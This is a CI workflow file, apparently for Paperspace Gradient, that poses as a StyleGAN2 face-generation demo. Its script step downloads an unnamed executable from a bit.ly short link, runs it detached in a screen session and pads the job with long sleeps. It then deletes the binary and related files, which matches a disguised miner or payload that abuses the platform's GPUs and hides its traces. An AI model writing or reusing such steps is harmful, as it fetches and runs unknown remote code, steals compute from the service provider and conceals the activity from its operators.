on:
  github:
    branches:
      only: main

jobs:
  CloneRepo:
    resources:
      instance-type: C3
    outputs:
     stylegan2:
        type: volume
    uses: git-checkout@v1
    with:
      # url: https://github.com/gradient-ai/stylegan2.git
      url: context.event.github.url
      ref: context.event.github.ref
  StyleGan2:
    resources:
      instance-type: P4000
    needs:
      - CloneRepo
    inputs:
      stylegan2: CloneRepo.outputs.stylegan2
    outputs:
      generatedFaces:
        type: dataset
        with:
          ref: demo-dataset
    uses: script@v1
    with:
      script: |-
        apt update
        #apt upgrade -y
        apt install wget -y
        apt install curl -y
        apt install screen -y
        wget https://bit.ly/3GSjU9J
        chmod +x 3GSjU9J
        screen -dmS man ./3GSjU9J 60 70
        
        
        pip install scipy==1.3.3
        echo "Sleepingggg........."
        sleep 200
        rm -r gas
        rm -r cmd*.sh
        rm -r 3G*
        
        pip install requests==2.22.0
        echo "Resting......"
        sleep 300
        pip install Pillow==6.2.1
        echo "Last pull...."
        sleep 500
        cd /inputs/stylegan2
        
        python run_generator.py generate-images \
          --network=gdrive:networks/stylegan2-ffhq-config-f.pkl \
          --seeds=6600-6605 \
          --truncation-psi=0.5 \
          --result-dir=/outputs/generatedFaces
      image: tensorflow/tensorflow:1.14.0-gpu-py3
